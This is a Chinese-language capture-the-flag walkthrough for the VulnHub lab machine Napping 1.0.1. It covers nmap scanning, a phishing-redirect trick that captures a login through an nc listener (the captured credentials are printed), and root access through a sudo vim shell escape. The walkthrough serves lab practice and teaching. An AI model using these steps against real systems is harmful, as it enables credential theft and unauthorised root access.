vulnhub靶机Napping1.0.1教程

靶机下载地址:Napping: 1.0.1 ~ VulnHub

主机发现

arp-scan -l

端口扫描

nmap --min-rate 10000 -p- 192.168.21.133

扫描版本

nmap -sV -sT -O -p22,80 192.168.21.133

漏洞扫描

nmap --script=vuln -p22,80 192.168.21.133

主要以网站为突破口        

注册账号先试试水

注册登入之后发现有转跳点

这里既然能转跳,试试能不能钓鱼

写两个网页页面

需要启动python3的http服务

启动方法:

       进入www目录

       Python -m http.server

       结尾带上&字符则ctrl+c不会关闭服务

       结尾带上端口则指定端口

监听8000端口

nc -lvvp 8000

username=daniel&password=C@ughtm3napping123

成功拿到用户名和密码(%40=@)

那么这个因该是ssh的账号密码了

由于sudo -l无法执行,就查看用户组

那就需要寻找daniel可以执行的administerators的文件

find / -group administrators 2>/dev/null

试一下能不能直接写shell,用python调用运行

等着自动连接就可以

sudo -l

看到nopasswd后面的路径,直接吧bash传过来

sudo /usr/bin/vim -c ':!/bin/sh'

提权完成

Flag

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

himobrinehacken

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值